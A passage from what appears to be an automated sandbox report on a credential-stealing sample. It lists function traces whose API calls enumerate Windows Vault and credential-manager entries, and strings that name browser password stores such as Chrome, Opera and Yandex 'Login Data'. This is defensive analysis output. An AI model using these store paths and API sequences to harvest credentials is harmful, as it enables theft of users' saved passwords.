                                                                                                                                                                    • Part of subcall function 004118EA: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,00409807,?,000000FF,00000000,00000104), ref: 004118FD
                                                                                                                                                                    • Part of subcall function 004118EA: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00411914
                                                                                                                                                                    • Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00411926
                                                                                                                                                                    • Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00411938
                                                                                                                                                                    • Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041194A
                                                                                                                                                                    • Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 0041195C
                                                                                                                                                                    • Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtQueryObject), ref: 0041196E
                                                                                                                                                                    • Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 00411980
                                                                                                                                                                    • Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtResumeProcess), ref: 00411992
                                                                                                                                                                  • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040981A
                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 00409843
                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040984E
                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 004098B7
                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 004098CA
                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 004098DD
                                                                                                                                                                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 004098F1
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 00409937
                                                                                                                                                                  • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 00409946
                                                                                                                                                                  • memset.MSVCRT ref: 00409964
                                                                                                                                                                  • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 00409997
                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 004099B7
                                                                                                                                                                  • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 004099F7
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                                                                                                                                                                  • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                                  • API String ID: 594330280-3398334509
                                                                                                                                                                  • Opcode ID: 744fbf75455b6098578e480c8635837c5c89e79d09ece7b140be473bd29f90d8
                                                                                                                                                                  • Instruction ID: 2b0fa152ef01bef0fcdaafddb1ab82311fd8af30ec04a4c20003f9f52c8fe1fb
                                                                                                                                                                  • Opcode Fuzzy Hash: 744fbf75455b6098578e480c8635837c5c89e79d09ece7b140be473bd29f90d8
                                                                                                                                                                  • Instruction Fuzzy Hash: 7B815E71900219EFEF10EF95C885AAEBBB5FF44305F20806EF905B6292D7399E41CB54
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004443B0, Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 40libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryW.KERNELBASE(vaultcli.dll,?,00000000), ref: 004443BD
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 004443D2
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 004443DF
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 004443EC
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,VaultFree), ref: 004443F9
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,VaultGetInformation), ref: 00444406
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 00444414
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0044441D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                                                  • String ID: VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetInformation$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                                                                                                                                  • API String ID: 2238633743-2107673790
                                                                                                                                                                  • Opcode ID: 78ba4d5693d53eadcf9c8744485d997ab560c1e320cc44334ae31523dad5f6ee
                                                                                                                                                                  • Instruction ID: bae3ddfd5a2cf1e2657d78bbfe85c411ed61fca9aeaa9a4901361c1bc58423a9
                                                                                                                                                                  • Opcode Fuzzy Hash: 78ba4d5693d53eadcf9c8744485d997ab560c1e320cc44334ae31523dad5f6ee
                                                                                                                                                                  • Instruction Fuzzy Hash: 5201E874940B44EFEB306F71CD09E07BAE4EF94B117118D2EE49A92A10D778E818CE54
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00413424, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040B1BF: free.MSVCRT(00000000,00410160,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,004448C6,00000000,?,0000000A), ref: 0040B1C6
                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413442
                                                                                                                                                                  • memset.MSVCRT ref: 00413457
                                                                                                                                                                  • Process32FirstW.KERNEL32(?,?), ref: 00413473
                                                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,?,00000000,?,?), ref: 004134B8
                                                                                                                                                                  • memset.MSVCRT ref: 004134DF
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413514
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 0041352E
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 00413580
                                                                                                                                                                  • free.MSVCRT(-00000028), ref: 00413599
                                                                                                                                                                  • Process32NextW.KERNEL32(?,0000022C), ref: 004135E2
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,0000022C), ref: 004135F2
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                                                                                  • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                  • API String ID: 1344430650-1740548384
                                                                                                                                                                  • Opcode ID: ed6fa7fbe2363a651f29f393370116b4659e51fbe7daf5e0a77eaee9eb31a363
                                                                                                                                                                  • Instruction ID: 336025cd3e57628a03d53de68a5eb917573850932ab3a304507e713d781e6372
                                                                                                                                                                  • Opcode Fuzzy Hash: ed6fa7fbe2363a651f29f393370116b4659e51fbe7daf5e0a77eaee9eb31a363
                                                                                                                                                                  • Instruction Fuzzy Hash: 3E518CB2C00118ABDB10DFA5DC84ADEF7B9AF95301F1040ABE508A3251DB799B84CF99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040938F, Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • FindFirstFileW.KERNELBASE(00000103,0000038B,00000000,?,00412880,*.*,?), ref: 004093A5
                                                                                                                                                                  • FindNextFileW.KERNELBASE(000000FF,0000038B,00000000,?,00412880,*.*,?), ref: 004093C3
                                                                                                                                                                  • wcslen.MSVCRT ref: 004093F3
                                                                                                                                                                  • wcslen.MSVCRT ref: 004093FB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileFindwcslen$FirstNext
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2163959949-0
                                                                                                                                                                  • Opcode ID: bbfa88675e90f7cab1951949309c9f409910220031eaa870910243319b313dcd
                                                                                                                                                                  • Instruction ID: fe44496fd245f22b3294f1be8fcbf5b62ffed3b59158e7af3f9261faba672c79
                                                                                                                                                                  • Opcode Fuzzy Hash: bbfa88675e90f7cab1951949309c9f409910220031eaa870910243319b313dcd
                                                                                                                                                                  • Instruction Fuzzy Hash: CA11E97240A7019FD7149B64E884A9B73DCEF45324F204A3FF459E31C1EB78AC008718
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004141E0, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • FindResourceW.KERNELBASE(?,?,?), ref: 004141ED
                                                                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 004141FE
                                                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 0041420E
                                                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 00414219
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3473537107-0
                                                                                                                                                                  • Opcode ID: ec51cf45041cf25647cccbc885ed45c86f25aef72003178a0d679bc8b0aad2a7
                                                                                                                                                                  • Instruction ID: 4db2b1a63d72691fd362fce079069d1f86e41d88e51d490a39d61a138898f27d
                                                                                                                                                                  • Opcode Fuzzy Hash: ec51cf45041cf25647cccbc885ed45c86f25aef72003178a0d679bc8b0aad2a7
                                                                                                                                                                  • Instruction Fuzzy Hash: A8019636A002156B8F155FA5DD4999F7FAAFFC67D0708803AF915CA221DB70C882C688
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00418073, Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00417F9B: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00417FC7
                                                                                                                                                                    • Part of subcall function 00417F9B: malloc.MSVCRT ref: 00417FD2
                                                                                                                                                                    • Part of subcall function 00417F9B: free.MSVCRT(?), ref: 00417FE2
                                                                                                                                                                    • Part of subcall function 00416CB6: GetVersionExW.KERNEL32(?), ref: 00416CD9
                                                                                                                                                                  • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004180ED
                                                                                                                                                                  • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 00418115
                                                                                                                                                                  • free.MSVCRT(00000000,?,00000000,?,00000000), ref: 0041811E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1355100292-0
                                                                                                                                                                  • Opcode ID: 8e76693c67f0b4aa2a9f0ce93b5e4d32a4f514a6f71b86ff027121c958f9ef7a
                                                                                                                                                                  • Instruction ID: 44f72dfadcd4ed0e6b0cb1466d7c09a20078aec04da8d2fdb22fffa922359726
                                                                                                                                                                  • Opcode Fuzzy Hash: 8e76693c67f0b4aa2a9f0ce93b5e4d32a4f514a6f71b86ff027121c958f9ef7a
                                                                                                                                                                  • Instruction Fuzzy Hash: 8A215076800118BEEB21ABA4CC449EF7BBCAF09344F1540ABE641D7211EB784EC587A9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0041829C, Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 004182A7
                                                                                                                                                                  • GetSystemInfo.KERNELBASE(00453D60,?,00000000,00442D20,?,?,?), ref: 004182B0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InfoSystemmemset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3558857096-0
                                                                                                                                                                  • Opcode ID: e09057acdafeef912d39132da5cb39305370b204b8372ac2ca77995ca7410ec3
                                                                                                                                                                  • Instruction ID: 3c0be6fe3b5a6ffc89f5b68e380a6edd79d3b36df5ca7f17532ee32b6b8f0e73
                                                                                                                                                                  • Opcode Fuzzy Hash: e09057acdafeef912d39132da5cb39305370b204b8372ac2ca77995ca7410ec3
                                                                                                                                                                  • Instruction Fuzzy Hash: 86E09235E01A242BE7117F767C07BDB26948F8A38AF04407BF904DA253EA6CCD414ADE
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004063BB, Relevance: 2.9, APIs: 2, Instructions: 415COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040B1BF: free.MSVCRT(00000000,00410160,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,004448C6,00000000,?,0000000A), ref: 0040B1C6
                                                                                                                                                                  • memset.MSVCRT ref: 004064B7
                                                                                                                                                                  • free.MSVCRT(00409BFD,00000000,?,00000000), ref: 004065AE
                                                                                                                                                                    • Part of subcall function 00405F0B: memcpy.MSVCRT ref: 00405F27
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: free$memcpymemset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2037443186-0
                                                                                                                                                                  • Opcode ID: 87bb0912cc168f4427a637e20596dc9ec97740ebca6445c1b4761c6aceef0b63
                                                                                                                                                                  • Instruction ID: 9763a21b998b4320822d5df799fc1cad8e230cd1267682af71ec74f08d94d328
                                                                                                                                                                  • Opcode Fuzzy Hash: 87bb0912cc168f4427a637e20596dc9ec97740ebca6445c1b4761c6aceef0b63
                                                                                                                                                                  • Instruction Fuzzy Hash: 3E026D71D002299BCB24DF65C8846EEB7B5FF48314F1584BAE84ABB381D7389A91CF54
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00411E4C, Relevance: 104.0, APIs: 43, Strings: 16, Instructions: 752COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00411EC2
                                                                                                                                                                  • wcsrchr.MSVCRT ref: 00411EDB
                                                                                                                                                                  • memset.MSVCRT ref: 0041202F
                                                                                                                                                                    • Part of subcall function 0040A94C: _wcslwr.MSVCRT ref: 0040AA14
                                                                                                                                                                    • Part of subcall function 0040A94C: wcslen.MSVCRT ref: 0040AA29
                                                                                                                                                                    • Part of subcall function 0040956D: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 004095A6
                                                                                                                                                                    • Part of subcall function 0040956D: wcslen.MSVCRT ref: 004095CC
                                                                                                                                                                    • Part of subcall function 0040956D: wcsncmp.MSVCRT(?,?,00000020,?,00000000,?), ref: 00409602
                                                                                                                                                                    • Part of subcall function 0040956D: memset.MSVCRT ref: 00409679
                                                                                                                                                                    • Part of subcall function 0040956D: memcpy.MSVCRT ref: 0040969A
                                                                                                                                                                    • Part of subcall function 0040ADD0: LoadLibraryW.KERNELBASE(pstorec.dll), ref: 0040ADE1
                                                                                                                                                                    • Part of subcall function 0040ADD0: GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 0040ADF4
                                                                                                                                                                    • Part of subcall function 004444B7: memcmp.MSVCRT ref: 0044455D
                                                                                                                                                                    • Part of subcall function 00410F47: memset.MSVCRT ref: 00410F6A
                                                                                                                                                                    • Part of subcall function 00410F47: memset.MSVCRT ref: 00410F7F
                                                                                                                                                                    • Part of subcall function 00410F47: memset.MSVCRT ref: 00410F94
                                                                                                                                                                    • Part of subcall function 00410F47: memset.MSVCRT ref: 00410FA9
                                                                                                                                                                    • Part of subcall function 00410F47: memset.MSVCRT ref: 00410FBE
                                                                                                                                                                    • Part of subcall function 00410F47: wcslen.MSVCRT ref: 00410FE4
                                                                                                                                                                    • Part of subcall function 00410F47: wcslen.MSVCRT ref: 00410FF5
                                                                                                                                                                    • Part of subcall function 00410F47: wcslen.MSVCRT ref: 0041102D
                                                                                                                                                                    • Part of subcall function 00410F47: wcslen.MSVCRT ref: 0041103B
                                                                                                                                                                    • Part of subcall function 00410F47: wcslen.MSVCRT ref: 00411074
                                                                                                                                                                    • Part of subcall function 00410F47: wcslen.MSVCRT ref: 00411082
                                                                                                                                                                  • memset.MSVCRT ref: 0041204B
                                                                                                                                                                  • memset.MSVCRT ref: 00412061
                                                                                                                                                                  • memset.MSVCRT ref: 0041207D
                                                                                                                                                                  • wcslen.MSVCRT ref: 004120C4
                                                                                                                                                                  • wcslen.MSVCRT ref: 004120D1
                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Sea Monkey,?,00000104), ref: 004121C5
                                                                                                                                                                  • memset.MSVCRT ref: 0041217E
                                                                                                                                                                    • Part of subcall function 00407991: memset.MSVCRT ref: 004079D1
                                                                                                                                                                    • Part of subcall function 00407991: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,?,00000000,?), ref: 004079EA
                                                                                                                                                                    • Part of subcall function 00407991: memset.MSVCRT ref: 00407A23
                                                                                                                                                                    • Part of subcall function 00407991: memset.MSVCRT ref: 00407A3B
                                                                                                                                                                    • Part of subcall function 00407991: memset.MSVCRT ref: 00407A53
                                                                                                                                                                    • Part of subcall function 00407991: memset.MSVCRT ref: 00407A6B
                                                                                                                                                                    • Part of subcall function 00407991: memset.MSVCRT ref: 00407A83
                                                                                                                                                                    • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407A8E
                                                                                                                                                                    • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407A9C
                                                                                                                                                                    • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407ACB
                                                                                                                                                                  • memset.MSVCRT ref: 00412241
                                                                                                                                                                  • memset.MSVCRT ref: 0041225B
                                                                                                                                                                  • wcslen.MSVCRT ref: 00412275
                                                                                                                                                                  • wcslen.MSVCRT ref: 00412283
                                                                                                                                                                  • memset.MSVCRT ref: 004122FD
                                                                                                                                                                  • memset.MSVCRT ref: 00412317
                                                                                                                                                                  • wcslen.MSVCRT ref: 00412331
                                                                                                                                                                  • wcslen.MSVCRT ref: 0041233F
                                                                                                                                                                  • memset.MSVCRT ref: 004123C2
                                                                                                                                                                  • memset.MSVCRT ref: 004123E0
                                                                                                                                                                  • memset.MSVCRT ref: 004123FE
                                                                                                                                                                  • memset.MSVCRT ref: 00412573
                                                                                                                                                                    • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407AD9
                                                                                                                                                                    • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407B08
                                                                                                                                                                    • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407B16
                                                                                                                                                                    • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407B45
                                                                                                                                                                    • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407B53
                                                                                                                                                                    • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407B82
                                                                                                                                                                    • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407B90
                                                                                                                                                                    • Part of subcall function 00407991: SetCurrentDirectoryW.KERNEL32(?), ref: 00407CAB
                                                                                                                                                                  • wcslen.MSVCRT ref: 0041245B
                                                                                                                                                                  • wcslen.MSVCRT ref: 00412469
                                                                                                                                                                  • wcslen.MSVCRT ref: 004124AF
                                                                                                                                                                  • wcslen.MSVCRT ref: 004124BD
                                                                                                                                                                  • wcslen.MSVCRT ref: 00412503
                                                                                                                                                                  • wcslen.MSVCRT ref: 00412511
                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 004125DA
                                                                                                                                                                    • Part of subcall function 004442F9: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000000,0041274B,?,?), ref: 00444310
                                                                                                                                                                    • Part of subcall function 004442F9: ??2@YAPAXI@Z.MSVCRT ref: 00444324
                                                                                                                                                                    • Part of subcall function 004442F9: memset.MSVCRT ref: 00444333
                                                                                                                                                                    • Part of subcall function 004442F9: ??3@YAXPAX@Z.MSVCRT ref: 00444356
                                                                                                                                                                    • Part of subcall function 004442F9: CloseHandle.KERNEL32(00000000), ref: 0044435D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: wcslen$memset$??2@??3@AddressByteCharCloseCredCurrentDirectoryEnumerateEnvironmentExpandFileHandleLibraryLoadMultiProcSizeStringsWide_wcsicmp_wcslwrmemcmpmemcpywcsncmpwcsrchr
                                                                                                                                                                  • String ID: %programfiles%\Sea Monkey$*.*$Chromium\User Data$Data\Profile$Google\Chrome SxS\User Data$Google\Chrome\User Data$Login Data$Opera$Opera Software\Opera Stable\Login Data$Opera\Opera7\profile\wand.dat$Opera\Opera\wand.dat$Path$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe$Vivaldi\User Data\Default\Login Data$Yandex\YandexBrowser\User Data\Default\Login Data$wand.dat
                                                                                                                                                                  • API String ID: 2195781745-1743926287
                                                                                                                                                                  • Opcode ID: 0dfe16fee904680cb0bfa71703a20f26bea0553467f296cf69df4e43642452a8
                                                                                                                                                                  • Instruction ID: 7a0d4c8da9719b4bd57d9e34dd235b5097b77d6fd782259e08ea59ad0a0aa82b
                                                                                                                                                                  • Opcode Fuzzy Hash: 0dfe16fee904680cb0bfa71703a20f26bea0553467f296cf69df4e43642452a8
                                                                                                                                                                  • Instruction Fuzzy Hash: 774293B2509344ABD720EBA5D985BDBB3ECBF84304F01092FF588D3191EBB8D545879A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040FF55, Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00403C8C: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040FF6D,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 00403CAB
                                                                                                                                                                    • Part of subcall function 00403C8C: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00403CBD
                                                                                                                                                                    • Part of subcall function 00403C8C: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040FF6D,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 00403CD1
                                                                                                                                                                    • Part of subcall function 00403C8C: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00403CFC
                                                                                                                                                                  • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 0040FF81
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00414266,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 0040FF9A
                                                                                                                                                                  • EnumResourceTypesW.KERNEL32 ref: 0040FFA1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                                  • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                  • API String ID: 2744995895-28296030
                                                                                                                                                                  • Opcode ID: f4a827cf65cbb4cb0b27562536f3745cfcd0fc63cfd5dde0fe9220dbb6d92dd4
                                                                                                                                                                  • Instruction ID: 58268879d1a8d32d9d01966b45afca8998e7ac275f8ef3c48d75c103cdcc3135
                                                                                                                                                                  • Opcode Fuzzy Hash: f4a827cf65cbb4cb0b27562536f3745cfcd0fc63cfd5dde0fe9220dbb6d92dd4
                                                                                                                                                                  • Instruction Fuzzy Hash: A8518F71508745AFDB20AFA2DC49A9FB7A8FF45344F40083EF684E2152DB79D8848B5A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00409CB0, Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004060BC: _wcsicmp.MSVCRT ref: 004060ED
                                                                                                                                                                    • Part of subcall function 004063BB: memset.MSVCRT ref: 004064B7
                                                                                                                                                                  • free.MSVCRT(00000000), ref: 00409E9F
                                                                                                                                                                    • Part of subcall function 00409755: _wcsicmp.MSVCRT ref: 0040976E
                                                                                                                                                                  • memset.MSVCRT ref: 00409D85
                                                                                                                                                                    • Part of subcall function 00408F43: wcslen.MSVCRT ref: 00408F56
                                                                                                                                                                    • Part of subcall function 00408F43: memcpy.MSVCRT ref: 00408F75
                                                                                                                                                                  • wcschr.MSVCRT ref: 00409DBD
                                                                                                                                                                  • memcpy.MSVCRT ref: 00409DF1
                                                                                                                                                                  • memcpy.MSVCRT ref: 00409E0C
                                                                                                                                                                  • memcpy.MSVCRT ref: 00409E27
                                                                                                                                                                  • memcpy.MSVCRT ref: 00409E42
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                                                  • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                  • API String ID: 3849927982-2252543386
                                                                                                                                                                  • Opcode ID: a83afb3fb1d886893dfdf5e60ec3ef205233330e3098ed3faae95944d2aa80c6
                                                                                                                                                                  • Instruction ID: 4efc6fce7ce7295637414d4ef923d95a635c1e3a2e0485d2030de31f1e6ccd1f
                                                                                                                                                                  • Opcode Fuzzy Hash: a83afb3fb1d886893dfdf5e60ec3ef205233330e3098ed3faae95944d2aa80c6
                                                                                                                                                                  • Instruction Fuzzy Hash: 4051FE71D40209ABEB50EFA5DC45B9EB7B8AF54304F15403BB504B72D2EB78AD048B98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040299E, Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 250fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 004029C4
                                                                                                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004029DB
                                                                                                                                                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 004029FC
                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00402A07
                                                                                                                                                                  • memset.MSVCRT ref: 00402A20
                                                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00402C96
                                                                                                                                                                    • Part of subcall function 004080FD: GetTempPathW.KERNEL32(00000104,?,?), ref: 00408114
                                                                                                                                                                    • Part of subcall function 004080FD: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00408126
